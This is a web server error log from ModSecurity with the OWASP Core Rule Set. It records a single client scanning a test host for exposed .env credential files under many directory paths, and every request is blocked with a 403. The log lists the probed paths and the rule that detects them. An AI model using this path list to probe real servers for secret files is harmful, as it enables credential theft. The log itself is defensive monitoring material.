[Sat Mar 21 04:09:49.758210 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env.production"] [unique_id "ab4L_dTas8ZTYtMe0Y3QtAAAAAE"]
[Sat Mar 21 04:09:49.758393 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env.production"] [unique_id "ab4L_dTas8ZTYtMe0Y3QtAAAAAE"]
[Sat Mar 21 04:09:49.758539 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env.production"] [unique_id "ab4L_dTas8ZTYtMe0Y3QtAAAAAE"]
[Sat Mar 21 04:09:50.052987 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /live/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/live/.env"] [unique_id "ab4L_tTas8ZTYtMe0Y3QtQAAAAE"]
[Sat Mar 21 04:09:50.053140 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/live/.env"] [unique_id "ab4L_tTas8ZTYtMe0Y3QtQAAAAE"]
[Sat Mar 21 04:09:50.053283 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/live/.env"] [unique_id "ab4L_tTas8ZTYtMe0Y3QtQAAAAE"]
[Sat Mar 21 04:09:50.347727 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env.local"] [unique_id "ab4L_tTas8ZTYtMe0Y3QtgAAAAE"]
[Sat Mar 21 04:09:50.347898 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env.local"] [unique_id "ab4L_tTas8ZTYtMe0Y3QtgAAAAE"]
[Sat Mar 21 04:09:50.348062 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env.local"] [unique_id "ab4L_tTas8ZTYtMe0Y3QtgAAAAE"]
[Sat Mar 21 04:09:50.642433 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env.production"] [unique_id "ab4L_tTas8ZTYtMe0Y3QtwAAAAE"]
[Sat Mar 21 04:09:50.642607 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env.production"] [unique_id "ab4L_tTas8ZTYtMe0Y3QtwAAAAE"]
[Sat Mar 21 04:09:50.642796 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env.production"] [unique_id "ab4L_tTas8ZTYtMe0Y3QtwAAAAE"]
[Sat Mar 21 04:09:50.937114 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env"] [unique_id "ab4L_tTas8ZTYtMe0Y3QuAAAAAE"]
[Sat Mar 21 04:09:50.937272 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env"] [unique_id "ab4L_tTas8ZTYtMe0Y3QuAAAAAE"]
[Sat Mar 21 04:09:50.937431 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env"] [unique_id "ab4L_tTas8ZTYtMe0Y3QuAAAAAE"]
[Sat Mar 21 04:09:51.231801 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "ab4L_9Tas8ZTYtMe0Y3QuQAAAAE"]
[Sat Mar 21 04:09:51.231969 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "ab4L_9Tas8ZTYtMe0Y3QuQAAAAE"]
[Sat Mar 21 04:09:51.232133 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "ab4L_9Tas8ZTYtMe0Y3QuQAAAAE"]
[Sat Mar 21 04:09:51.526670 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.staging"] [unique_id "ab4L_9Tas8ZTYtMe0Y3QugAAAAE"]
[Sat Mar 21 04:09:51.526852 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.staging"] [unique_id "ab4L_9Tas8ZTYtMe0Y3QugAAAAE"]
[Sat Mar 21 04:09:51.527047 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.staging"] [unique_id "ab4L_9Tas8ZTYtMe0Y3QugAAAAE"]
[Sat Mar 21 04:09:51.821352 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.production"] [unique_id "ab4L_9Tas8ZTYtMe0Y3QuwAAAAE"]
[Sat Mar 21 04:09:51.822521 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.production"] [unique_id "ab4L_9Tas8ZTYtMe0Y3QuwAAAAE"]
[Sat Mar 21 04:09:51.822675 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.production"] [unique_id "ab4L_9Tas8ZTYtMe0Y3QuwAAAAE"]
[Sat Mar 21 04:09:52.116913 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stg/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/stg/.env.staging"] [unique_id "ab4MANTas8ZTYtMe0Y3QvAAAAAE"]
[Sat Mar 21 04:09:52.117089 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/stg/.env.staging"] [unique_id "ab4MANTas8ZTYtMe0Y3QvAAAAAE"]
[Sat Mar 21 04:09:52.117248 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/stg/.env.staging"] [unique_id "ab4MANTas8ZTYtMe0Y3QvAAAAAE"]
[Sat Mar 21 04:09:52.412200 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shop/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/shop/.env.local"] [unique_id "ab4MANTas8ZTYtMe0Y3QvQAAAAE"]
[Sat Mar 21 04:09:52.412382 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/shop/.env.local"] [unique_id "ab4MANTas8ZTYtMe0Y3QvQAAAAE"]
[Sat Mar 21 04:09:52.412557 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/shop/.env.local"] [unique_id "ab4MANTas8ZTYtMe0Y3QvQAAAAE"]
[Sat Mar 21 04:09:52.707753 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.staging"] [unique_id "ab4MANTas8ZTYtMe0Y3QvgAAAAE"]
[Sat Mar 21 04:09:52.707971 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.staging"] [unique_id "ab4MANTas8ZTYtMe0Y3QvgAAAAE"]
[Sat Mar 21 04:09:52.708150 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.staging"] [unique_id "ab4MANTas8ZTYtMe0Y3QvgAAAAE"]
[Sat Mar 21 04:09:53.003161 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nodeweb/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/nodeweb/.env"] [unique_id "ab4MAdTas8ZTYtMe0Y3QvwAAAAE"]
[Sat Mar 21 04:09:53.003316 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/nodeweb/.env"] [unique_id "ab4MAdTas8ZTYtMe0Y3QvwAAAAE"]
[Sat Mar 21 04:09:53.003480 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/nodeweb/.env"] [unique_id "ab4MAdTas8ZTYtMe0Y3QvwAAAAE"]
[Sat Mar 21 04:09:53.298287 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env.staging"] [unique_id "ab4MAdTas8ZTYtMe0Y3QwAAAAAE"]
[Sat Mar 21 04:09:53.298545 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env.staging"] [unique_id "ab4MAdTas8ZTYtMe0Y3QwAAAAAE"]
[Sat Mar 21 04:09:53.298732 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env.staging"] [unique_id "ab4MAdTas8ZTYtMe0Y3QwAAAAAE"]
[Sat Mar 21 04:09:53.593233 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.sample.php"] [unique_id "ab4MAdTas8ZTYtMe0Y3QwQAAAAE"]
